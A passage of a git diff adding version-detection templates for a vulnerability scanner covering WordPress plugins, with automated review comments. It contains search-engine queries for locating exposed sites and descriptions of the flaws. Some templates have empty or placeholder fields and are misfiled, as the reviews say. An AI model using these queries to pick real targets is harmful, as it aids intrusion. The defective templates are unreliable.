+ - "cosmosfarm-share-buttons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml b/poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
new file mode 100644
index 0000000000..132f83f96a
--- /dev/null
+++ b/poc/sql/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3
+
+info:
+ name: >
+ ArCa Payment Gateway <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The ArCa Payment Gateway plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ec069ef-7b53-47b5-93bc-92cfc2d62c88?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-53759
+ metadata:
+ fofa-query: "wp-content/plugins/arca-payment-gateway/"
+ google-query: inurl:"/wp-content/plugins/arca-payment-gateway/"
+ shodan-query: 'vuln:CVE-2024-53759'
+ tags: cve,wordpress,wp-plugin,arca-payment-gateway,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arca-payment-gateway/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arca-payment-gateway"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml b/poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
new file mode 100644
index 0000000000..a82e876f3e
--- /dev/null
+++ b/poc/sql/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0
+
+info:
+ name: >
+ Cowidgets – Elementor Addons <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Cowidgets – Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a29ebdcb-3b03-4504-b553-6f7633c68f3f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-53786
+ metadata:
+ fofa-query: "wp-content/plugins/cowidgets-elementor-addons/"
+ google-query: inurl:"/wp-content/plugins/cowidgets-elementor-addons/"
+ shodan-query: 'vuln:CVE-2024-53786'
+ tags: cve,wordpress,wp-plugin,cowidgets-elementor-addons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cowidgets-elementor-addons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cowidgets-elementor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.0')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml b/poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
new file mode 100644
index 0000000000..a93a6d8a8b
--- /dev/null
+++ b/poc/sql/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1
+
+info:
+ name: >
+ Lenxel Core <= 1.1 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.1. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dac404d-369c-4036-9c64-4afab021cbe8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-53790
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-53790'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml b/poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml
new file mode 100644
index 0000000000..f349b13ac1
--- /dev/null
+++ b/poc/sql/best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b.yaml
@@ -0,0 +1,59 @@
+id: best-addons-for-elementor-bd743f52479cb010ad232ebee7dbf30b
+
+info:
+ name: >
+ Best Addons for Elementor <= 1.0.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/559165ed-f7f6-4f5a-ad37-8a2d53924888?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/best-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/best-addons-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,best-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/best-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "best-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.5')
\ No newline at end of file
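Review bot: The `info` block is missing most of its content: `description: >` is followed by an empty line, `cvss-metrics`, `cvss-score` and `cve-id` have no value (bare keys parse as null), and `shodan-query: 'vuln:'` has no identifier after the colon. The `tags:` line still starts with `cve` although no CVE id is given, so a tag-based selection of CVE templates would include this file. I would drop the empty keys and the `shodan-query` line, remove `cve` from the tags, and add a one-sentence description taken from the Wordfence record linked in `reference`. The same empty fields appear in the bin-stripe-donation, capitalize-my-title, chatter, content-audit-exporter, countdown-timer-for-elementor, cultbooking-booking-engine, mycred-b69b…, out-of-stock-badge and (only partly visible) paypal-responder templates.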
diff --git a/poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml b/poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml
new file mode 100644
index 0000000000..2fe6816d17
--- /dev/null
+++ b/poc/sql/bin-stripe-donation-26be16d9007bef8defcdb810970efcf9.yaml
@@ -0,0 +1,59 @@
+id: bin-stripe-donation-26be16d9007bef8defcdb810970efcf9
+
+info:
+ name: >
+ Stripe Donation <= 1.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4335e598-d48b-4dbe-b6a4-69790acecfdd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bin-stripe-donation/"
+ google-query: inurl:"/wp-content/plugins/bin-stripe-donation/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bin-stripe-donation,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bin-stripe-donation/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bin-stripe-donation"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml b/poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
new file mode 100644
index 0000000000..7f0398197f
--- /dev/null
+++ b/poc/sql/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
@@ -0,0 +1,59 @@
+id: capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db
+
+info:
+ name: >
+ Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/capitalize-my-title/"
+ google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,capitalize-my-title,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "capitalize-my-title"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.5.3')
\ No newline at end of file
diff --git a/poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml b/poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml
new file mode 100644
index 0000000000..6aed97655a
--- /dev/null
+++ b/poc/sql/chatter-50f846e0f4847e28db594b1f3b22c537.yaml
@@ -0,0 +1,59 @@
+id: chatter-50f846e0f4847e28db594b1f3b22c537
+
+info:
+ name: >
+ Chatter <= 1.0.1 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f2c6349-9444-4cea-90ae-f396ae92f85a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/chatter/"
+ google-query: inurl:"/wp-content/plugins/chatter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,chatter,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/chatter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "chatter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml b/poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml
new file mode 100644
index 0000000000..efb0110edc
--- /dev/null
+++ b/poc/sql/content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3.yaml
@@ -0,0 +1,59 @@
+id: content-audit-exporter-e79372032f3cd9964820840ddb7f0ea3
+
+info:
+ name: >
+ Content Audit Exporter <= 1.1 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba6f8837-813c-4e16-9adb-fdc90ccaf0ca?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/content-audit-exporter/"
+ google-query: inurl:"/wp-content/plugins/content-audit-exporter/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,content-audit-exporter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/content-audit-exporter/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "content-audit-exporter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
diff --git a/poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml b/poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml
new file mode 100644
index 0000000000..2ccb59d5b0
--- /dev/null
+++ b/poc/sql/countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07.yaml
@@ -0,0 +1,59 @@
+id: countdown-timer-for-elementor-e125cc11edbf54c4514f0c2218a86a07
+
+info:
+ name: >
+ Countdown Timer for Elementor <= 1.3.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e2d35599-2402-4837-97a3-707cd33d439a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/countdown-timer-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/countdown-timer-for-elementor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,countdown-timer-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/countdown-timer-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "countdown-timer-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
diff --git a/poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml b/poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml
new file mode 100644
index 0000000000..7a6904a0bd
--- /dev/null
+++ b/poc/sql/cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f.yaml
@@ -0,0 +1,59 @@
+id: cultbooking-booking-engine-5eb904d4a3173fdb3278f6a25598e63f
+
+info:
+ name: >
+ CultBooking Hotel Booking Engine <= 2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/79844b53-5527-42e2-8363-db0eb73d1f6c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cultbooking-booking-engine/"
+ google-query: inurl:"/wp-content/plugins/cultbooking-booking-engine/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cultbooking-booking-engine,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cultbooking-booking-engine/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cultbooking-booking-engine"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1')
\ No newline at end of file
diff --git a/poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml b/poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
new file mode 100644
index 0000000000..d97cca740d
--- /dev/null
+++ b/poc/sql/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
@@ -0,0 +1,59 @@
+id: mycred-b69b74183494c4b8dbaaa94b47c77a89
+
+info:
+ name: >
+ myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.5.2')
\ No newline at end of file
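Review bot: This template repeats the check that the CVE-2024-11201 template earlier in this diff already performs: both reference Wordfence id `2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a`, request `/wp-content/plugins/mycred/readme.txt` and match on `compare_versions(version, '<= 2.7.5.2')`. Every affected host would be reported twice, once with the CVE classification and once with empty `classification` fields. I would keep only the CVE-2024-11201 file, or de-duplicate the generated templates on the Wordfence id before committing them.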
diff --git a/poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml b/poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml
new file mode 100644
index 0000000000..bcf2dfd748
--- /dev/null
+++ b/poc/sql/out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65.yaml
@@ -0,0 +1,59 @@
+id: out-of-stock-badge-824e800865ecf93bf8922dba7aad4e65
+
+info:
+ name: >
+ Out Of Stock Badge <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b80802cd-6fcc-4cdb-b6d7-a9171cadcc83?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/out-of-stock-badge/"
+ google-query: inurl:"/wp-content/plugins/out-of-stock-badge/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,out-of-stock-badge,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/out-of-stock-badge/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "out-of-stock-badge"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
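Review bot: The `info` block ships with placeholders instead of data: `description: >` has no text, `cvss-metrics`, `cvss-score` and `cve-id` are bare keys that parse as null, and `shodan-query: 'vuln:'` is a query with no value. The `tags` line still carries `cve`, so tag-based selection and reporting will treat this as a CVE template although no CVE id is recorded. Either fill the fields from the Wordfence advisory linked under `reference`, or remove the empty keys and drop `cve`, e.g. `tags: wordpress,wp-plugin,out-of-stock-badge,medium`. The mycred template in the previous section and the templates that follow in this part of the commit carry the same placeholders.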
diff --git a/poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml b/poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml
new file mode 100644
index 0000000000..d5272ac577
--- /dev/null
+++ b/poc/sql/paypal-responder-2bb28c0dbe7d31806c826438ecefef2f.yaml
@@ -0,0 +1,59 @@
+id: paypal-responder-2bb28c0dbe7d31806c826438ecefef2f
+
+info:
+ name: >
+ PayPal Responder <= 1.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c6b43a4f-ef44-46cf-89ce-5747ac5f47cd?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/paypal-responder/"
+ google-query: inurl:"/wp-content/plugins/paypal-responder/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,paypal-responder,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/paypal-responder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "paypal-responder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2')
\ No newline at end of file
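Review bot: This file is added under `poc/sql/`, but its `name` describes Cross-Site Request Forgery to Stored Cross-Site Scripting and nothing in the template relates to SQL injection. Anyone who selects templates by directory gets this check in an SQL-injection run and misses it in an XSS run. The same holds for the `mycred`, `out-of-stock-badge`, `vertical-carousel-slider` and `wp-media-optimizer-webp` sections under `poc/sql/` in this commit. I would file them under the directory that matches the advisory, or state in the repository documentation that directories are not a reliable category and that `tags` should be used for selection.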
diff --git a/poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml b/poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml
new file mode 100644
index 0000000000..60e3239a82
--- /dev/null
+++ b/poc/sql/plugin-5dcfaa6624128695b8dbff266dad887f.yaml
@@ -0,0 +1,59 @@
+id: plugin-5dcfaa6624128695b8dbff266dad887f
+
+info:
+ name: >
+ eDoc Easy Tables <= 1.29 - Cross-Site Request Forgery to SQL Injection
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd9d7d34-c03d-4791-94b4-9d2f502a7e37?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/Plugin/"
+ google-query: inurl:"/wp-content/plugins/Plugin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,Plugin,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/Plugin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "Plugin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.29')
\ No newline at end of file
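Review bot: The slug used throughout this template is the literal `Plugin` (in `path` as `/wp-content/plugins/Plugin/readme.txt`, in the word matcher, in `tags` and in both search queries), which looks like an unfilled placeholder rather than the directory name of eDoc Easy Tables. The word matcher `"Plugin"` adds no specificity either, since that string is likely to appear in almost any WordPress readme. As written the template most likely never fires for the product in its `name`, and a silent scan then reads as "not affected". Confirm the real slug from the linked Wordfence advisory and use it in `path`, `words`, `fofa-query`, `google-query` and `tags`.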
diff --git a/poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml b/poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml
new file mode 100644
index 0000000000..0fb3ace178
--- /dev/null
+++ b/poc/sql/verowa-connect-e19e41c4fd554c823dba2f39d46b632a.yaml
@@ -0,0 +1,59 @@
+id: verowa-connect-e19e41c4fd554c823dba2f39d46b632a
+
+info:
+ name: >
+ Verowa Connect <= 3.0.1 - Unauthenticated SQL Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da47f6-4cfe-480e-9472-bd5efc8bac71?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/verowa-connect/"
+ google-query: inurl:"/wp-content/plugins/verowa-connect/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,verowa-connect,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/verowa-connect/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "verowa-connect"
+ part: body
+
